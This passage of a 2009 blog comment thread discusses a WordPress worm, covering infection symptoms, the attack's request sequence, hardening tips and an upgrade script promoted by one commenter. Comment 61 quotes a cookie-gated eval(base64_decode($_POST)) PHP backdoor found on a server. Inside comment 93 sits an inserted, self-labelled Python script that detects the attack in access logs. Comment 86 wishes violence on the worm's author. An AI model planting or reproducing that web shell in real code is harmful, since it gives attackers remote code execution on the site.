    Again, I recognize that you’re the wrong person to preach to on this. You’re not a core developer on the team, and so you have little or no control over the policies that the team follows in these types of situations.

    But, your blog is a highly ranked and highly credible source. And so if anyone searches for detailed information on this or any other exploit, your blog will be top of the search results. So you do have influence.

    Please, please, I beg you… take this feedback in the constructive manner in which it is intended. I am not a hater — or a troll — or a drupal/typepad/joomla/etc/etc fanboy trying to diss on the wordpress team. I am a serious professional, raising a legitimate and constructive criticism of the processes used by the WP team to handle security issues like this.

    I am simply suggesting that the team could adopt different practices that would be more consistent with the best practices followed by teams like the Apache, MySQL, PHP, or *nix teams.

    Thank you for your time.

  50. bill
    Posted September 6, 2009 at 3:01 pm | Permalink

    help. When I tried to update I get this:

    Fatal error: Allowed memory size of 33554432 bytes exhausted (tried to allocate 2357046 bytes) in /home/domainname/public_html/wp/wp-includes/http.php on line 1327

    • Posted September 7, 2009 at 12:05 am | Permalink

      @bill: It’s a server memory error. Check with your web host. You are probably on shared hosting.

      @Lucazzo: Comments that begin and end with [...] are trackbacks. If you cannot read them, it means your web browser cannot read that language.

  51. Posted September 6, 2009 at 5:06 pm | Permalink

    My upgrade to 2.8.4 was disastrous, it removed my website from view, even though the admin panel was accessible. After contacting my hosting company I was informed the 2.8.4 upgrade negatively impacted several themes. I’m using Quadruple Blue, and have been for almost a year. Unfortunately, this wordpress theme will not ‘work’ with the update, so I had to revert back to 2.8.3. For all who say they don’t understand why people do not upgrade, this is my reason. Whether the 2.8.4 was rushed into implementation, or due diligence was not thorough enough in the testing phase, is unclear. What is clear is the fear of wordpress upgrades harming valid WP themes at any given time.

  52. Posted September 6, 2009 at 7:42 pm | Permalink

    ismyblogworking.com will check if your blog has been infected by the exploit, and warn you if it needs upgrading.

  53. Joseph
    Posted September 6, 2009 at 8:22 pm | Permalink

    Hey guys,

    I have written a PHP script to search for & remove vulnerable code & any ‘extra’ admin found on your wordpress site.

    This script will also upgrade your wordpress to the latest version.

    No PHP system, exec or any regular execution command is used as I know some webhosts disable them… it will work as long as you have PHP 4/5 & the curl function.

    What the script does
    ===============
    1. Search for vulnerable code
    2. Backup wp’s database
    3. Upgrade your wp to the latest

    Instructions:
    =========

    1. Download the script from http://www.mxhub.com/fix_update_wp.zip
    2. Upload to your wordpress directory where wp-config resides
    3. Go to http://example.com/fix_update_wp.php to start the engine.
    4. Done.

    5. Give your feedback or report any problem.
    http://forums.mxhub.com/showthread.php?t=798

    My humble coding. Works for what I wanted. Hope it helps.
    -joseph

    • Posted September 6, 2009 at 11:56 pm | Permalink

      @Joseph: Thanks, however, I’ve been told that while this might remove the surface issues, it could still leave a backdoor open for hackers to get in. Hopefully, you’ve offered this to Automattic and the WordPress staff and development team for their vetting and to help others.

      Since so many are impacted by this, and so many of the quick fixes offered on the web don’t really clean out this worm, the WordPress team may offer something more comprehensive.

      @TexasCowboy: It’s so easy to blame WordPress when it is a WordPress Theme issue. WordPress does not vet any Themes, other than cleaning them up for consistency and checking for spammy content or hidden evils when added to the official WordPress Theme Directory. A WordPress Theme is your responsibility and that of the author to keep it updated and functioning. Please contact the WordPress Theme author for an updated version. If they haven’t, consider switching to a newer free Theme.

      WordPress has taken great care in the past couple of years to not make any upgrades that will negatively impact the majority of Themes and Plugins. Ones that are poorly coded or not supported and updated can fail to make the upgrade process, but if your Theme was updated and functioning from 2.8.3 to 2.8.4, you would not have noticed any changes, as none were made that impacted WordPress Themes.

      I understand the fear, but the WordPress Community works hard to educate everyone through every major release and upgrade, as well as the minor updates, on what changes and needs to change, and most of these are minor and easily implemented. With the new update announcements of Themes, Plugins, and the core of WordPress, you are seconds from knowing when an update is available and can easily update with a couple clicks.

  54. Posted September 6, 2009 at 10:07 pm | Permalink

    Is it possible that my plugins are compromised because of the attack?

    • Posted September 6, 2009 at 11:52 pm | Permalink

      @Aadi: The attack does not impact WordPress Plugins directly nor specifically. However, if you are using a Plugin that accesses permalinks or things that are impacted by the hack of the invading worm, the Plugins could be impacted, though not compromised.

  55. Posted September 6, 2009 at 10:36 pm | Permalink

    Thanks Lorelle, great article. Very comprehensive. I learned my lesson about a year ago when a Joomla site of mine was defaced. I also understand the balance between updating immediately and maintaining plugin and theme functionality. In this case, it’s obvious that the upgrade is more important. Fortunately, I upgraded all my WP sites ahead of time.

    Thanks again for all the great info!!!

  56. Posted September 7, 2009 at 3:43 am | Permalink

    Unfortunately, upgrading immediately is not possible for us. We are regression testing our code that interfaces with WordPress at the moment but it is likely to be weeks before we are ready to upgrade.

    Can you provide us with more details about the behaviour of the worm (such as user-agent, IP ranges, request strings, etc.) so we can block it by other means?

    I know that this is not a good long term solution but it seems crazy to just sit here, unprotected by anything at all, until we can safely upgrade WordPress.

  57. sammo
    Posted September 7, 2009 at 4:34 am | Permalink

    Nice write up. When did this exploit start? Do you know? I upgraded to 2.8.4 a couple of days after that version was available and I’ve just checked my sites and found 2 of them with this exploit. I have both the weird URL structure and additional user in my db.

  58. karachoooo
    Posted September 7, 2009 at 5:28 am | Permalink

    Who says that WP 2.8.4 is not vulnerable to the current hack? Some pplz are reporting their 2.8.4 blogs were compromised as well.

  59. DG
    Posted September 7, 2009 at 5:58 am | Permalink

    Lorelle,

    Sorry for the confusion, it was a typo; what I mean is the attacks continue in the form of RFIs and other spam query strings that are just drowning all bandwidth & other resources.

    The attacks are from .cn, .kr, .ru, .net, .com and more domains. I’ve tried to block a lot of them using mod_rewrite, as collected from the web. But couldn’t block others, as I’m no htaccess guru.

    I think some .htaccess guru from the WordPress community can easily help in writing proper rules to eliminate these attacks. If interested, I can provide more details (RFIs, spam query strings, and spam links).

    DG…

  60. Posted September 7, 2009 at 6:23 am | Permalink

    Lorelle, I saw your post and Mark’s announcement but there is no proof of concept of this worm. I checked milw0rm, BugTraq and other full disclosure mailing lists and still there is no explanation of how this worm works in technical words, only the effects are explained.

    • Posted September 7, 2009 at 9:43 pm | Permalink

      @fwolf: If you are using a version of WordPress without an upgrade option, then, as said in the article, your site is out of date. Please upgrade.

      @Cliff Calderwood: Upgrading WordPress is now a single click. Don’t you wish all software was that easy. :D

      @Matteo Campofiorito: It’s a holiday weekend in the US. For those in the business of tracking these things, maybe they will have the news tomorrow. I’m sure there will soon be so much information about the details of how this worm works, we’ll be bored. :D In the meantime, why not read Fellow’s Paper on Worms, though it’s in German.

      @karachoooo: As stated in the article and the WordPress announcement, if your site has already been compromised, upgrading does no good. It will still be compromised.

      @sammo: This worm exploit started in its original form, to my limited understanding, a few months ago, prompting WordPress to immediately release WordPress 2.8.3. WordPress 2.8.3 and 2.8.4 are protected. The original reports of people with 2.8.3 being infected were due to them already having the worm infection before they upgraded. Once your site is impacted by the worm, upgrading will not resolve the issue. This round is impacting a lot of WordPress users, not just other platforms, and those who did not upgrade are at risk. If you have the “weird stuff” in your WordPress blog, your site is infected and upgrading will not fix it. You will have to follow the instructions in the article to try to do a clean reinstall, carefully.

      @Dave: The upgrade from very recent versions should not impact your development project. If it does, then you are not keeping up with what you will need to move forward in the future in general. And if it is a test site, then totally close it down to the public and password protect the whole thing, following typical security protection suggestions. Either way, details on the worm in its current form are just coming out. Check the WordPress Support Forum for details. I expect a lot of reports starting tomorrow once people get back from vacations.

  61. sammo
    Posted September 7, 2009 at 9:58 am | Permalink

    In addition to what I’ve already commented above, I’ve just found a dodgy php file in the root of the installs that contains:

    if(md5($_COOKIE['fbfb439649881d6a'])=="3ddd13238886729c8f26ffc4e32c4658fc"){ eval(base64_decode($_POST['file'])); exit; }

  62. Posted September 7, 2009 at 10:10 am | Permalink

    I always suggest that clients upgrade whenever an update is available for the WordPress script. It’s the best way to protect yourself from being attacked!

  63. Joseph
    Posted September 7, 2009 at 10:25 am | Permalink

    @sammo: I just did a check over one of the affected wp sites.. no such line found..

  64. sammo
    Posted September 7, 2009 at 10:33 am | Permalink

    @joseph: The code I posted wasn’t the exact line. I changed the encoded elements to random stuff and it was all enclosed in <?php tags. Sorry, should have said. Don't know if that makes a difference. File date is 05/09/09.

  65. Joseph
    Posted September 7, 2009 at 10:43 am | Permalink

    @sammo:
    Yeah, I searched for ‘md5($_COOKIE ‘ only. :D Actually, I looked through all the files which had a mention of ‘md5(‘ & ‘_COOKIE’ as well.
    No line that looks like what you posted.. ;)

  66. Posted September 7, 2009 at 11:02 am | Permalink

    This is all nice blabla, but what if upgrading IS NOT AN OPTION?
    No site I’ve come over so far does mention this.

    So it’s all nice and shiny, but still just useless blabla to me.

    cu, w0lf.

  67. sammo
    Posted September 7, 2009 at 11:45 am | Permalink

    @Joseph: Maybe this is part of something else then.

  68. Posted September 7, 2009 at 3:49 pm | Permalink

    Hi Lorelle, thank you for this useful tutorial! It’s been a long time since I’ve seen you! Are you OK? God bless you and your family, hugs :o)

    enore

  69. Posted September 7, 2009 at 9:06 pm | Permalink

    I noticed the problem with this hack at my blog yesterday when my permalink structure was changed. So on looking for reasons why, I stumbled across this issue here. I used the information in the post and resource links to solve the problem by upgrading and erasing the additional admin account in my database.

    I appreciate the work that went into letting people know.

    As regards a lot of the comments chastising people who don’t upgrade, I guess I would say I run a business and find it difficult to keep up with all the upgrades that come at you using WordPress. Maybe one day I can afford a webmaster that knows what they’re doing and can be trusted – until then I’ll just have to keep on top of wordpress hacks.

  70. Adria Richards
    Posted September 7, 2009 at 10:06 pm | Permalink

    I’ve been a fan of Lorelle’s site and she certainly helped me get started in tweaking WordPress themes and learning the structure.

    [Removed Sales Pitch - Note: If you choose to promote WordPress products and services, please respect the trademark name.]

  71. Posted September 7, 2009 at 10:08 pm | Permalink

    Thanks for sharing this great information. Just updated mine.

  72. Posted September 7, 2009 at 11:11 pm | Permalink

    @Adria Richards: I don’t think it is appropriate to advertise your paid service here. Not every blogger can afford that.

    Anyway, my fix & update wp script has successfully upgraded any old version to the latest wp. (The last few blogs I upgraded were 2.5.x ; )

    If anyone like to do a quick security check and upgrade your wp to the latest at the same time, check out:
    http://forums.mxhub.com/showthread.php?t=798

    Did I mention it is FREE? ;)

  73. Adria Richards
    Posted September 8, 2009 at 12:00 am | Permalink

    @Joseph,

    “Blogger” does not equal Ramen eating college student.

    Not all bloggers want to do the technical part of blogging and spend weeks figuring something out, just like most people take their cars in for an oil change but some do it themselves. Maybe you do your own oil changes.

    I’ve already posted videos at WordPress.tv about upgrading from WordPress 2.7 to 2.8. That’s free and many people have watched it and left comments.

    Upgrade WordPress 2.7 to 2.8 in CPanel.

  74. Posted September 8, 2009 at 12:06 am | Permalink

    @Adria Richards, at the end of the day, you still hope some noob will request your service because they do not know how to do what you did in the video. FREE to watch the video but definitely not FREE to do all the work.

    My script is simple:
    1. Upload the script
    2. Run it
    3. DONE!

    It backs up your wp’s db and runs all the checks & the upgrade automatically. Easy as 1 2 3!

  75. Posted September 8, 2009 at 12:46 am | Permalink

    @fwolf – As Lorelle said, you should upgrade or do your best to upgrade ASAP. There are ways though, if you really want to spend the time to do some work on securing your current version of WordPress. It’s NOT recommended, nor is it the best route to go about it. But like you said, not many sites cover what to do to plug your holes in the old versions. For doing something like you’re wanting, you’re looking at quite a bit of work done on the research of what security holes have been fixed since your version, then a type of “code” merger. If you’re unable to upgrade because you’ve got a highly customized version of WordPress, maybe now is the time to move over to building plugins that are separate from the WordPress interface. Contact me if you have any further questions as I can definitely point you in the right direction and help you with that process.

  76. sammo
    Posted September 8, 2009 at 2:16 am | Permalink

    @Lorelle: Thanks. I’ve done a clean install now on both installations and everything looks good. I checked back through my daily back-ups and logs etc and it looks like the new stuff was added on 05/09/09 on a 2.8.4 install, so I am not entirely sure that 2.8.4 is clear. My server techs can’t see how they got in either unfortunately :(

  77. Posted September 8, 2009 at 2:23 am | Permalink

    Might I add that I’m not a big fan of the “the latest version of software is secure” approach? 2.8.2 wasn’t secure, but an expert would have said that if you had that, you were. In fact, many many versions of WordPress have been found to be insecure in one way or another. That’s normal – and there may well be zero day exploits for 2.8.4.

    The way it’s written, the platform it uses, and the market it’s targeted at makes it prone to weaknesses.

    Consequently a lot also depends on how your system is configured. Too many servers, both shared and dedicated, are poorly configured. Relying on WordPress alone for your security is foolish if you run a business critical blog (a hobbyist has less to worry about, I suppose) and so a common sense approach has to be taken. One must think of WordPress security as simply a front door to the server. If someone breaks down that front door, an alarm system makes sense, and a safe to put your valuables in helps too.

    I’ve written about this in some depth and it’s not the be all and end all, but it’s a starting point to understanding the nature of web application security.

  78. Posted September 8, 2009 at 2:41 am | Permalink

    @Scott Kingsley Clark:
    Highly customized is probably on the themes/plugins part in ‘wp-content’ directory.

    As long as you did not have any additional or custom scripts in ‘wp-includes’ & ‘wp-admin’, a clean install & upgrade is safe.

  79. Posted September 8, 2009 at 2:43 am | Permalink

    Hi Lorelle, I know that it “shouldn’t” affect our development but I am a Sysadmin, and, as such, I don’t have the sign-off on upgrading. Thanks to Sarbanes-Oxley, pretty much anything involving any sort of risk of non-functioning websites involves a two-week lead time. This also tends to lead to very out of date software because nobody could be bothered going through the change control hell but that’s a separate issue.

    A response to my question at [0] suggests that the exploit requires user registration to be turned on. Can you confirm that we are safe from this particular worm if we turn user registration off ?

    Ideally, I’d like someone to post something like [1] for this worm but nobody seems to want to do that. The WordPress forums and all of the blogs talking about this only ever have two things to say: 1) Upgrade and 2) here’s how to clean your database up if you were too slow upgrading.

    I’m quite happy to do the analysis myself if someone who was infected would be willing to send me the relevant portion of their Apache access logs.

    [0] http://zedomax.com/blog/2009/09/06/wordpress-diy-how-to-check-for-spam-links-after-being-attacked-by-hackers/?dsq=16090662#comment-16090662
    [1] http://ocaoimh.ie/did-your-wordpress-site-get-hacked/

  80. Posted September 8, 2009 at 3:08 am | Permalink

    Turning registration off solves the problem according to [0] which seems like a reputable source. However, the very next post [1] claims that he was hacked even with registrations turned off. Since he is not sure which version he is running and didn’t see the broken permalink issue I suspect he got hit by a different worm that is using the same “hidden admin” payload.

    [0] http://wordpress.org/support/topic/297639/page/2#post-1203740
    [1] http://wordpress.org/support/topic/297639/page/3#post-1203788

  81. Posted September 8, 2009 at 3:23 am | Permalink

    @Dave: I can confirm that EVEN WITH registration turned off, the new admin user is still inserted into the database. (For my case, the nickname the hacker inserted is ‘JaredBoyce86′.) The attack was traced back to have started on 4th September 2009. This happened to one of my customers, which prompted me to write up a script to fix the permalink & admin issue.

  82. Posted September 8, 2009 at 7:38 am | Permalink

    [Editor's Note: Before acting upon this information, please read this comment from Otto42. Also, for more updated information, please check the WordPress Support Forum.]

    I have found a lot more information on this now, mostly from the thread at [0] and I’ll sum up what I know.

    The attack happens on wp-admin//options-permalink.php (note the double slash) and is a POST request. I have not yet seen the POST variables for that request. Following this request there is a POST request for xmlrpc.php that includes a payload, base64 encoded in the referer field. The permalink exploit seems to enable the xmlrpc exploit. The xmlrpc exploit includes a file from a remote server, on a Chinese domain that adds a new admin user and hides it from displaying in WordPress using javascript and CSS.

    Prior to both of these requests, which constitute the actual attack, there are a couple of reconnaissance requests to determine your WordPress version by its capabilities and a couple of requests that register new users. Some reports show that there may be hours or even days between any of the steps of registering the users, exploiting the permalinks and adding the new admin user.

    I would guess, based on the bot logging in before running the exploit, that the permalink exploit requires a logged in (but not admin) user. This means that switching registrations off will not help if the bot has already registered a user on your blog. If your permalinks have been changed but you have no new admin user yet then changing the permalinks back will probably (I can’t confirm this) prevent the admin user being created. (However the bot can simply exploit the permalink again.)

    The IP addresses are from all over the place and the user-agents seem to be copied from legitimate browsers so neither of those can be used for filtering.

    Some things that can be used to make yourself safe from this worm:
    1. Use mod_rewrite to deny double slashes in URLs.
    2. Limit wp-admin to your IP address if you have a static one.
    2a. Limit wp-admin to your ISP’s IP range if you are on a dynamic IP.
    3. Put HTTP authentication on wp-admin.

    Some additional things that would prevent the second part of the attack:
    1. Turn off fopen_wrappers [1]
    2. Configure your firewall to not allow outbound HTTP requests.
    3. Remove xmlrpc.php

    All of these are good ideas to do anyway, even if you have already upgraded. Most of them have usability consequences (security is always a trade-off) but these are the ones that I consider to be a good trade-off.

    [0] http://wordpress.org/support/topic/307518/page/4?replies=16
    [1] http://uk2.php.net/manual/en/filesystem.configuration.php#ini.allow-url-fopen

  83. Posted September 8, 2009 at 8:52 am | Permalink

    Dave: You’re essentially correct, but some of your suggestions are a bit off.

    1. The vulnerability being exploited is the one fixed in 2.8.3. Only 2.8.2 and earlier are vulnerable to this particular attack.

    2. A logged in user is indeed required to perform this attack, but one may not be necessary to exploit this vulnerability.

    3. The permalink change does enable the rest of the attack.

    4. The xmlrpc.php file is not vulnerable and has no security problem. It’s just the most handy way in. Removing this file does nothing for protection, as once the permalink change is made, any single post URL is equally vulnerable. Automated hacking mechanisms always use xmlrpc.php, just because they can.

    The only security measure that will actually work is, of course, to Upgrade WordPress to the latest version.

    If this is not immediately viable, then disabling user registration will stop this particular attack for now, but it is not a viable solution for most people, nor will it stop a determined hacker, as the vulnerability remains regardless. Patching earlier versions is not particularly easy, since these issues had to be patched twice in WordPress itself (in 2.8.1 and 2.8.3) as the problem was a complex one.

    If plugin compatibility is a problem preventing you from upgrading, then you need to be searching for alternative plugins that are well-maintained instead of relying on outdated and unsupported systems.

  84. Posted September 8, 2009 at 9:43 am | Permalink

    Thanks for the confirmation Otto,

    I’m not suggesting this instead of upgrading. I’m suggesting these if, as in my case, you can’t upgrade yet. Upgrading is still highly recommended by me (and everyone else. :-)

    Your points 2. and 4. are quite interesting and do change what I thought I knew about this. Having not seen it first-hand makes it difficult to “know” very much at all.

    We have never allowed user registrations so I’m not so worried about our installation as I once was. However, the thought that the exploit might still be possible even without a logged in user begins to trouble me again. I have implemented some of my own recommendations so I know this particular attack won’t affect our site, even if the exploit is possible without a registered user.

    As far as upgrading is concerned, it is our own development work, not plugins, that causes us to need to test everything before upgrading. I currently work with a team of 4 developers and in my last job (where we also used WordPress) we had a team of 70 developers. My role in these teams has always been to make sure we are not vulnerable by limiting and switching off services or features as necessary while the development and testing teams did their work.

  85. Posted September 8, 2009 at 10:54 am | Permalink

    Ahh. Well, okay. More info then.

    Basically, the exploit lets them change the permalink without having the proper authorization to do so. They change it into that eval(base64_decode(blah blah string you’ve seen elsewhere.

    This string is rather clever, in that it allows them to send a special HTTP header that executes as PHP code when the permalink string is processed. As you’ve seen, from there they use fopen to remotely load and execute their payload, which then downloads more, creates the admin users, etc.

    Quick patch if you want to live patch against this particular one:

    http://core.trac.wordpress.org/changeset/11761/trunk/wp-admin/options-permalink.php

    That doesn’t fix the overall problem, but will protect from this specific case.

    To see why it doesn’t fix the overall problem: http://core.trac.wordpress.org/changeset/11761/ There’s more patches along those lines in 2.8.1 and such.

  86. Falco Stellare
    Posted September 8, 2009 at 10:55 am | Permalink

    It would be nice to see someone set the worm author’s home on fire… Just to thank him for his nice contribution to the community… :-(

  87. K
    Posted September 8, 2009 at 12:53 pm | Permalink

    Given the amount of work needed to upgrade my WordPress I would rather take it down until the worm is identified than go through all the really nasty backwards-incompatibility issues.

  88. Posted September 8, 2009 at 5:37 pm | Permalink

    @K : I have upgraded a customer’s blog (his is either 2.5 or 2.6.x ) with TONS of plugins and a custom theme. All of them are in wp-content which I did not touch during the upgrade using my fix_wp_update script.

    Simply follow the instructions over here. Upload the fix_wp_update script. It will do a security scan & remove any threat. Next, it will back up your wp’s db and run the upgrade automatically. Takes less than 5 min to complete.

    forums.mxhub.com/showthread.php?t=798

    Let me know if you run into any problem. I will look into this for you personally for FREE!!!!!!!

  89. @hmad
    Posted September 8, 2009 at 7:21 pm | Permalink

    Nobody is secure any more in this world.

  90. Posted September 8, 2009 at 10:23 pm | Permalink

    Yeah, I upgraded my WP to 2.8.4 and even then my site got attacked lol

  91. Posted September 8, 2009 at 10:51 pm | Permalink

    @pankaj: What kind of ‘hacked’ symptoms did you encounter for your wp 2.8.4? When did you upgrade your blog?

  92. Daniel Sydnes
    Posted September 9, 2009 at 12:51 am | Permalink

    Three of our 40+ WordPress installs were hacked — one on 8/31 and two on 9/4. Here is what we discovered during forensic analysis:

    – The worm that hit us is different than previous worms that attacked other web applications like Joomla.

    – The worm specifically targets older WordPress versions by leveraging search engine queries. For example:

    http://www.google.com/search?q=meta+generator+content+WordPress+2.7

    – The hack exploited vulnerabilities in wp-login.php to create a new administrator-level user.

    – It’s frightening how fast these attacks occurred. They used only FIVE http requests per exploited blog. Our intrusion detection systems would have detected and blocked SQL injections and dictionary attacks.

    – Our damage was limited to database changes. The file system was protected by file permissions set as advised in the “Hardening WordPress” Codex article. We followed all the advice in that article.

    Some general observations from a WordPress fan:

    – FOUR security updates in FIVE weeks is an abysmal record. These vulnerabilities were in core files, not 3rd party libraries, themes, or plugins.

    – BY DEFAULT, WordPress, Plugins and Themes should never advertise versions in public-facing pages. This information is too easily exploited via search engine targeting. End users shouldn’t have to hack PHP code or install 3rd party security plugins to remove information that serves no purpose other than to assist hackers. Interestingly, WordPress.com removes version information on all their hosted code.

    – Every major software vendor recognizes that end users sometimes cannot immediately upgrade due to maintenance schedules, software conflicts, and regression testing. That’s where mitigation and work-arounds help most. Advice on htaccess, mod_rewrite, mod_security, iRules, or similar patches could significantly limit damage.

    – Perhaps the WordPress dashboard could warn about insecure file permissions, similar to the WP Super Cache plugin. Better yet, offer to correct the issues via FTP/SFTP.

    – Perhaps changes to admin settings (e.g., permalink structure, user registration, blog email address) could fire off an email notification, similar to what already occurs with account creation.

    – A scripted patch mechanism would be nice for those of us hosting dozens, hundreds, or even thousands of blog installations.

    – Differential patches — maybe just indicating modified files — would be nice too. If this is already available via subversion, a best practices article on the WordPress codex would be very helpful.

  93. Daniel Sydnes
    Posted September 9, 2009 at 1:12 am | Permalink

    @Otto42:You wrote:
    “If this is not immediately viable, then disabling user registration will stop this particular attack for now…”

    Two of our hacked blogs had user registration already disabled. The worm ENABLED user registration. So that doesn’t appear to be a successful mitigation strategy.

    According to our logs, the worm made the following requests:
    "GET /xmlrpc.php HTTP/1.1"
    "GET /wp-login.php HTTP/1.1"
    "POST /wp-login.php HTTP/1.1"
    "GET /wp-admin/profile.php HTTP/1.1"
    "GET /wp-admin//options-permalink.php HTTP/1.1"

    The user-agent was faked, so it’s useless.
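    Comment 82 and comment 93 between them give enough to write a log check that does not depend on the faked user-agent or the scattered IPs: the double slash in `wp-admin//options-permalink.php`, a POST to `xmlrpc.php` whose Referer is a base64 blob instead of a URL, and the five-request chain Daniel listed. The script below is an added example, not code from this page, from either commenter, or from WordPress; it parses Apache combined-format lines and reports, per client IP, which of those three indicators appear. The log lines it runs on are constructed, with documentation IP ranges and a made-up base64 referer, and the request sequence is taken from Daniel’s list.

```python
"""Flag the request pattern described in comments 82 and 93 in Apache
combined-format access logs. Added example, not code from the page or
from WordPress. All log lines are constructed samples."""
import base64
import re
from collections import defaultdict

# Apache "combined" format: ip ident user [ts] "req" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# The chain from comment 93, in order. A browser never produces this sequence.
ATTACK_CHAIN = [
    ("GET", "/xmlrpc.php"),
    ("GET", "/wp-login.php"),
    ("POST", "/wp-login.php"),
    ("GET", "/wp-admin/profile.php"),
    ("GET", "/wp-admin//options-permalink.php"),
]


def parse_line(line: str):
    """Return a dict of fields for one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line.rstrip("\n"))
    return m.groupdict() if m else None


def looks_base64(s: str, min_len: int = 16) -> bool:
    """Browsers put a URL in Referer; comment 82 says the worm puts a base64 payload there."""
    if len(s) < min_len or s.startswith(("http://", "https://")):
        return False
    if not re.fullmatch(r"[A-Za-z0-9+/=]+", s):
        return False
    try:
        base64.b64decode(s, validate=True)
        return True
    except ValueError:  # binascii.Error is a ValueError subclass
        return False


def analyze(lines) -> dict:
    """Return {ip: sorted indicator names} for every client IP showing at least one indicator."""
    per_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec:
            per_ip[rec["ip"]].append(rec)

    report = {}
    for ip, recs in per_ip.items():
        found = set()
        steps = [(r["method"], r["path"].split("?")[0]) for r in recs]
        for (method, path), rec in zip(steps, recs):
            if "//" in path and path.endswith("options-permalink.php"):
                found.add("double_slash_permalink")
            if method == "POST" and path.endswith("/xmlrpc.php") and looks_base64(rec["referer"]):
                found.add("xmlrpc_post_b64_referer")
        # Subsequence match: the five steps in order, other requests may sit between them.
        i = 0
        for step in steps:
            if i < len(ATTACK_CHAIN) and step == ATTACK_CHAIN[i]:
                i += 1
        if i == len(ATTACK_CHAIN):
            found.add("recon_login_permalink_chain")
        if found:
            report[ip] = sorted(found)
    return report


# Constructed sample log: one client that walks the chain, one normal visitor.
UA = "Mozilla/5.0 (Windows; U; Windows NT 5.1)"
FAKE_REF = base64.b64encode(b"CONSTRUCTED_SAMPLE_PAYLOAD").decode()
SAMPLE_LOG = [
    f'198.51.100.7 - - [04/Sep/2009:03:12:01 +0000] "GET /xmlrpc.php HTTP/1.1" 200 42 "-" "{UA}"',
    f'198.51.100.7 - - [04/Sep/2009:03:12:02 +0000] "GET /wp-login.php HTTP/1.1" 200 1820 "-" "{UA}"',
    f'198.51.100.7 - - [04/Sep/2009:03:12:03 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "{UA}"',
    f'198.51.100.7 - - [04/Sep/2009:03:12:04 +0000] "GET /wp-admin/profile.php HTTP/1.1" 200 9100 "-" "{UA}"',
    f'198.51.100.7 - - [04/Sep/2009:03:12:05 +0000] "GET /wp-admin//options-permalink.php HTTP/1.1" 200 7700 "-" "{UA}"',
    f'198.51.100.7 - - [04/Sep/2009:03:12:06 +0000] "POST /xmlrpc.php HTTP/1.1" 200 120 "{FAKE_REF}" "{UA}"',
    '203.0.113.9 - - [04/Sep/2009:03:20:11 +0000] "GET /2009/09/hello-world/ HTTP/1.1" 200 14000 "http://www.example.com/" "Mozilla/5.0 (X11; Linux)"',
    '203.0.113.9 - - [04/Sep/2009:03:20:40 +0000] "POST /xmlrpc.php HTTP/1.1" 200 300 "-" "ScribeFire/3.0"',
]

if __name__ == "__main__":
    for ip, indicators in analyze(SAMPLE_LOG).items():
        print(ip, ", ".join(indicators))
```

    The normal visitor’s XML-RPC POST from a desktop client is not flagged because its Referer is not a base64 blob, and the chain check is a subsequence match so unrelated requests between the steps do not hide it. Run it as `analyze(open("access.log"))` on a real log; a hit on `double_slash_permalink` alone is worth checking against the options table even if the other two are absent, since comment 82 notes the steps can be hours or days apart and may land in different log files.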

  94. Posted September 9, 2009 at 5:40 am | Permalink

    Thanks – have received a few emails about this from trusted sources, so I’m now going through and updating all of my blogs!

  95. Posted September 9, 2009 at 6:42 am | Permalink

    - The worm specifically targets older WordPress versions by leveraging search engines queries. For example:

    http://www.google.com/search?q=meta+generator+content+WordPress+2.7

    This is false. I have logs from WordPress 2.8.4 sites that received the same hack attempts you’re describing. They would not have shown up in such a search.

  96. Posted September 9, 2009 at 6:44 am | Permalink

    Interestingly, WordPress.com removes version information on all their hosted code.

    This is true, but not for the reasons given. WordPress.com is running the latest version of WordPress MU at pretty much all times. And when I say “latest”, I mean it, as they push the code from the SVN system to the live system something like 10 times a day. It’s the bleeding edge code, all the time.

  97. Posted September 9, 2009 at 11:44 am | Permalink

    Thanks to everyone for chiming in here, but I need some serious help. I am not familiar with WordPress design. Our site has been hacked per the description above, and my understanding is that I cannot easily upgrade to the newest version of WP because of the custom theme that was installed when we started. I can’t reach our developer and need a resource to get our site backed up, clean, and updated. If anyone can recommend a resource, I would greatly appreciate it. I am flying blind!! Will pay for services. We post every day and I am freaked out that we could be compromised here.

  98. David Gagnon
    Posted September 9, 2009 at 6:51 pm | Permalink

    My question could be silly, but I’m not a pro…

    Can you create a new user and set it as administrator, then log in with that new user and delete the “admin” user (default). Could you prevent the attack by doing that?

  99. Posted September 9, 2009 at 7:20 pm | Permalink

    @Emily: It should be safe to upgrade.
    The upgrade will not touch your ‘wp-content’ folder, which contains your plugins and theme. So, it is safe.

    @David Gagnon: -_-” . No comment. :D lol.

  100. Posted September 10, 2009 at 12:25 am | Permalink

    I think you have put your time into writing this article; that is why it’s great.

  101. Posted September 10, 2009 at 2:55 am | Permalink

    May it attack very old versions? Like 2.2, for instance? They were different in the DB version.

  102. Posted September 11, 2009 at 1:03 am | Permalink

    What about 2.9-rare? Is that branch safe?

  103. Posted September 12, 2009 at 10:15 am | Permalink

    Hi Lorelle, thanks for your post, it’s been interesting reading. I have/had this worm in all my blogs, which I use as a CMS on my domain. I reset the permalink structure, I have deleted the extra admin, and I have updated my WordPress to the latest version. I have been symptom free for several days.

    Are my blogs now clean? I am unsure if I need to do full new installs or if my actions so far have been enough. Your help would be appreciated.

    • Posted September 12, 2009 at 11:19 am | Permalink

      @Glenn Kilpatrick:Many are claiming they are free of this security attack by doing the surface things, but they aren’t. Seriously, if you have been infected, a full clean reinstall is best. Why risk it. Scoble did. Look what trouble he got in when they returned.

      @kovshenin: WordPress bleeding edge goodies are updated when past versions are updated. And remember, these pre-beta testing versions are not to be used by the timid nor inexpert.

  104. Posted September 13, 2009 at 1:44 am | Permalink

    Hello again, sorry to bother you yet again. I have just been speaking to my hosts about the attack and a fresh install. They are suggesting that even the database may be infected. Is this the case? Or will a clean install be enough to get this out? Obviously I am now very concerned as there’s years and years of posts in several of my blogs.

  105. Posted September 13, 2009 at 8:29 am | Permalink

    @Glenn Kilpatrick: I believe it’s been mentioned many times that a fresh database install is best, but that doesn’t mean you have to lose any of your posts at all. Just export them under “Tools->Admin” and import them again in the fresh database. Use a fresh copy of your theme and all plugins. You will have to set your widgets and plugins up again – but everything else will be fresh.

